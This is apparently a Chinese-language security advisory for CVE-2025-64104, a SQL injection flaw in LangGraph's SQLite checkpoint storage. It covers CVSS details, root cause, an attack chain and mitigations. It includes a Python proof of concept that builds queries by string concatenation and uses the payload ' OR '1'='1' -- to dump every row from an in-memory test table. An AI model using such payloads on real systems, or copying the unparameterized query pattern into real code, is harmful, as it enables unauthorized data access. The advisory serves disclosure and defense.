CVE-2025-64104: LangGraph SQLite Checkpoint SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-64104

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LangGraph SQLite Checkpoint (LangGraph < 2.0.11)

漏洞概述

CVE-2025-64104是LangGraph项目中一个高危SQL注入漏洞。LangGraph是一个用于构建有状态、多参与者应用程序的框架，其SQLite Checkpoint实现提供了基于SQLite数据库的检查点保存功能（支持同步和异步操作，通过aiosqlite实现）。在2.0.11之前的版本中，该SQLite存储实现存在严重的安全缺陷：开发人员在构建SQL查询时使用了直接字符串拼接的方式，而没有采用参数化查询（Prepared Statements）进行输入过滤和转义。这一设计缺陷使得攻击者可以通过构造特殊的输入数据，向SQL查询中注入任意SQL语句，从而绕过应用程序的访问控制机制。攻击者利用此漏洞可以在数据库层面执行未授权的操作，包括但不限于读取、修改或删除敏感数据，甚至可能在特定条件下获取服务器控制权限。由于该漏洞的CVSS评分为7.3，属于高危级别，且攻击向量为本地（AV:L），需要低权限（PR:L）即可利用，因此对使用受影响版本LangGraph的应用程序构成严重威胁。建议所有用户立即升级到2.0.11或更高版本以修复此漏洞。

技术细节

该SQL注入漏洞的根本原因在于LangGraph的SQLite存储实现中，SQL查询的构建方式存在安全缺陷。开发人员在构造SQL语句时，直接将用户输入或应用程序数据拼接到SQL字符串中，而没有使用参数化查询（Prepared Statements）进行安全处理。这种不安全的编程实践允许攻击者通过在输入中注入SQL元字符和命令来操纵查询逻辑。攻击者可以构造包含SQL特殊字符（如单引号、分号、UNION等）的输入，利用字符串拼接的漏洞改变原本SQL语句的结构和执行逻辑。例如，攻击者可以通过注入恶意的thread_id或checkpoint_id值，在WHERE子句中构造永真条件或添加额外的SQL语句，从而绕过访问控制并访问未授权的数据。在某些配置下，攻击者甚至可能通过多语句执行（需要SQLite特定配置）来执行DROP TABLE等破坏性操作。修复后的版本2.0.11采用了参数化查询的方式，将用户输入作为绑定参数传递，而不是直接拼接到SQL字符串中，从而从根本上杜绝了SQL注入的可能性。

攻击链分析

STEP 1

1

攻击者识别目标应用程序使用了存在漏洞的LangGraph版本（< 2.0.11）

STEP 2

2

攻击者分析应用程序的输入点，特别是与SQLite Checkpoint交互的thread_id、checkpoint_id等参数

STEP 3

3

攻击者构造包含SQL特殊字符（如单引号、分号、UNION等）的恶意输入

STEP 4

4

通过直接字符串拼接，恶意SQL片段被注入到查询语句中，改变查询逻辑

STEP 5

5

攻击者利用注入的SQL绕过访问控制，读取未授权的checkpoint数据或执行其他恶意操作

STEP 6

6

在特定配置下，攻击者可能通过多语句执行进行更严重的攻击，如数据篡改或删除

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-64104 PoC - LangGraph SQLite Checkpoint SQL Injection
Note: This is a simplified demonstration for educational purposes only.
"""

import sqlite3
import aiosqlite
import asyncio

# Vulnerable code pattern (before fix)
def vulnerable_query_builder(thread_id, checkpoint_id):
    """
    Simulates the vulnerable SQL query construction in LangGraph < 2.0.11
    Direct string concatenation without parameterization
    """
    # This is the vulnerable pattern - direct string interpolation
    query = f"SELECT * FROM checkpoints WHERE thread_id = '{thread_id}' AND checkpoint_id = '{checkpoint_id}'"
    return query

# Example of SQL Injection payload
def generate_sql_injection_payload():
    """
    Generate SQL injection payload to bypass authentication
    """
    # Payload to inject: ' OR '1'='1' --
    malicious_thread_id = "' OR '1'='1' --"
    malicious_checkpoint_id = "anything"
    return malicious_thread_id, malicious_checkpoint_id

# Demonstrate the vulnerability
def demonstrate_vulnerability():
    # Create a test database
    conn = sqlite3.connect(':memory:')
    cursor = conn.cursor()
    
    # Create test table with sensitive data
    cursor.execute('''
        CREATE TABLE checkpoints (
            thread_id TEXT,
            checkpoint_id TEXT,
            data TEXT,
            access_level TEXT
        )
    ''')
    
    # Insert test data
    cursor.execute("INSERT INTO checkpoints VALUES ('user1', 'ckpt1', 'secret_data_1', 'user')")
    cursor.execute("INSERT INTO checkpoints VALUES ('user2', 'ckpt2', 'secret_data_2', 'admin')")
    conn.commit()
    
    # Normal query (intended behavior)
    print("=== Normal Query ===")
    normal_query = vulnerable_query_builder('user1', 'ckpt1')
    print(f"Query: {normal_query}")
    cursor.execute(normal_query)
    print(f"Result: {cursor.fetchall()}")
    
    # Malicious query (SQL Injection)
    print("\n=== SQL Injection Attack ===")
    malicious_thread_id, malicious_checkpoint_id = generate_sql_injection_payload()
    malicious_query = vulnerable_query_builder(malicious_thread_id, malicious_checkpoint_id)
    print(f"Malicious Query: {malicious_query}")
    cursor.execute(malicious_query)
    print(f"Result (ALL data leaked): {cursor.fetchall()}")
    
    conn.close()

# Async example for LangGraph async usage
async def vulnerable_async_query(db_path, thread_id, checkpoint_id):
    """
    Vulnerable async query pattern used in LangGraph async implementation
    """
    async with aiosqlite.connect(db_path) as db:
        # Vulnerable: direct string formatting
        query = f"SELECT * FROM checkpoints WHERE thread_id = '{thread_id}'"
        async with db.execute(query) as cursor:
            return await cursor.fetchall()

if __name__ == "__main__":
    demonstrate_vulnerability()
    print("\n[!] This PoC demonstrates the SQL injection vulnerability.")
    print("[!] Upgrade to LangGraph >= 2.0.11 to fix this issue.")

影响范围

LangGraph < 2.0.11

防御指南

临时缓解措施

如果无法立即升级，可以采取以下临时缓解措施：1）使用Web应用防火墙（WAF）过滤SQL注入特征；2）实施严格的输入验证和白名单机制；3）限制应用程序的网络访问；4）监控数据库查询日志以检测异常攻击行为；5）考虑临时使用其他Checkpoint实现（如PostgreSQL或Memory）替代SQLite实现。但这些措施均为临时解决方案，根本修复仍需升级到LangGraph 2.0.11或更高版本。